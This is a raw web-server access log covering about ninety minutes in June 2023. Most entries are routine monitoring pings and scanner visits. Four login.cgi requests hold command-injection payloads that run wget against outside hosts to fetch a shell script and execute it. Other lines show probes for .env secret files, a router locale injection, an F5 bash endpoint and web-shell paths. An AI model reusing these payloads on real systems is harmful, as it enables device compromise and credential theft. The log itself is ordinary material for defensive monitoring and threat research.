212.91.246.72 - - [01/Jun/2023:22:32:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.14.26.208 - - [01/Jun/2023:22:32:31 +0200] "GET /restore.php HTTP/1.1" 404 316 "-" "-"
103.14.26.208 - - [01/Jun/2023:22:32:31 +0200] "GET /restore.php HTTP/1.1" 404 316 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:33:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.110.32.156 - - [01/Jun/2023:22:33:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Jun/2023:22:34:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:35:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:36:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:37:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:38:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
211.196.92.241 - - [01/Jun/2023:22:38:34 +0200] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 400 406 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:39:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:40:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:41:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.106 - - [01/Jun/2023:22:42:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [01/Jun/2023:22:42:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:43:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:44:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.98.242.75 - - [01/Jun/2023:22:44:54 +0200] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 400 406 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:45:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:46:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:47:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:48:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:49:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.66.230.201 - - [01/Jun/2023:22:49:48 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:50:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.110.32.156 - - [01/Jun/2023:22:50:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Jun/2023:22:51:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:52:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:53:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:54:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.116.52.89 - - [01/Jun/2023:22:54:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Jun/2023:22:55:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:56:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.91 - - [01/Jun/2023:22:57:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Jun/2023:22:57:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:58:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:59:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:00:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.181.60.12 - - [01/Jun/2023:23:01:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
212.91.246.72 - - [01/Jun/2023:23:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:02:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:03:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.144.21.56 - - [01/Jun/2023:23:03:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
195.144.21.56 - - [01/Jun/2023:23:03:35 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
195.144.21.56 - - [01/Jun/2023:23:03:35 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
195.144.21.56 - - [01/Jun/2023:23:03:35 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
195.144.21.56 - - [01/Jun/2023:23:03:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
109.205.213.108 - - [01/Jun/2023:23:04:09 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [01/Jun/2023:23:04:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:05:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:06:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:07:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:08:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.222 - - [01/Jun/2023:23:08:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Jun/2023:23:09:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:10:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:11:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:12:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.110.32.156 - - [01/Jun/2023:23:12:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
51.158.37.186 - - [01/Jun/2023:23:12:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.158.37.186 - - [01/Jun/2023:23:12:42 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
212.91.246.72 - - [01/Jun/2023:23:13:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:14:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:15:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:16:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:17:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:18:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:19:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.189.168.176 - - [01/Jun/2023:23:19:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Jun/2023:23:20:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:21:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:22:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
182.253.115.229 - - [01/Jun/2023:23:23:05 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
182.253.115.229 - - [01/Jun/2023:23:23:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.58.0"
212.91.246.72 - - [01/Jun/2023:23:23:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:24:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:25:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:26:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:27:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.66.230.201 - - [01/Jun/2023:23:27:32 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [01/Jun/2023:23:28:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:29:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:30:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.26.135.81 - - [01/Jun/2023:23:30:51 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [01/Jun/2023:23:30:51 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [01/Jun/2023:23:30:52 +0200] "GET /sendgrid/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [01/Jun/2023:23:30:53 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jun/2023:23:31:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:32:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:33:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:34:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:35:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:36:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.227.116.221 - - [01/Jun/2023:23:36:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.116.221 - - [01/Jun/2023:23:36:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.116.221 - - [01/Jun/2023:23:36:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.116.221 - - [01/Jun/2023:23:36:24 +0200] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.116.221 - - [01/Jun/2023:23:36:24 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
165.227.116.221 - - [01/Jun/2023:23:36:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.116.221 - - [01/Jun/2023:23:36:24 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.116.221 - - [01/Jun/2023:23:36:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
165.227.116.221 - - [01/Jun/2023:23:36:25 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.116.221 - - [01/Jun/2023:23:36:25 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.116.221 - - [01/Jun/2023:23:36:25 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
109.205.213.41 - - [01/Jun/2023:23:37:07 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [01/Jun/2023:23:37:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:38:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.199.31.214 - - [01/Jun/2023:23:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
104.199.31.214 - - [01/Jun/2023:23:38:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
212.91.246.72 - - [01/Jun/2023:23:39:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:40:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:41:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:42:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.20.234.201 - - [01/Jun/2023:23:43:08 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [01/Jun/2023:23:43:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:44:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.215 - - [01/Jun/2023:23:45:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.215 - - [01/Jun/2023:23:45:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.215 - - [01/Jun/2023:23:45:10 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.215 - - [01/Jun/2023:23:45:10 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Jun/2023:23:45:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.227.116.221 - - [01/Jun/2023:23:45:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.116.221 - - [01/Jun/2023:23:45:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.116.221 - - [01/Jun/2023:23:45:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.116.221 - - [01/Jun/2023:23:45:24 +0200] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.116.221 - - [01/Jun/2023:23:45:25 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
165.227.116.221 - - [01/Jun/2023:23:45:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.116.221 - - [01/Jun/2023:23:45:25 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.116.221 - - [01/Jun/2023:23:45:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
165.227.116.221 - - [01/Jun/2023:23:45:25 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.116.221 - - [01/Jun/2023:23:45:26 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.227.116.221 - - [01/Jun/2023:23:45:26 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Jun/2023:23:46:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:47:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:48:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:49:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:50:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:51:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.116.52.89 - - [01/Jun/2023:23:51:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.177.57.157 - - [01/Jun/2023:23:51:23 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
198.199.108.86 - - [01/Jun/2023:23:51:45 +0200] "MGLNDD_212.91.246.87_80" 501 338 "-" "-"
198.199.108.86 - - [01/Jun/2023:23:51:57 +0200] "MGLNDD_212.91.246.83_80" 501 338 "-" "-"
198.199.108.86 - - [01/Jun/2023:23:52:14 +0200] "MGLNDD_212.91.246.89_80" 501 338 "-" "-"
212.91.246.72 - - [01/Jun/2023:23:52:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:53:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.108.86 - - [01/Jun/2023:23:53:29 +0200] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
198.199.108.86 - - [01/Jun/2023:23:53:33 +0200] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
198.199.108.86 - - [01/Jun/2023:23:53:34 +0200] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
198.199.108.86 - - [01/Jun/2023:23:53:48 +0200] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
198.199.108.86 - - [01/Jun/2023:23:54:00 +0200] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
212.91.246.72 - - [01/Jun/2023:23:54:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.108.86 - - [01/Jun/2023:23:54:32 +0200] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
198.199.108.86 - - [01/Jun/2023:23:54:52 +0200] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
212.91.246.72 - - [01/Jun/2023:23:55:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:56:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:57:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:58:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:23:59:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.66.230.201 - - [02/Jun/2023:00:02:54 +0200] "" 501 315 "-" "-"
45.128.232.62 - - [02/Jun/2023:00:03:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
142.93.180.85 - - [02/Jun/2023:00:08:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
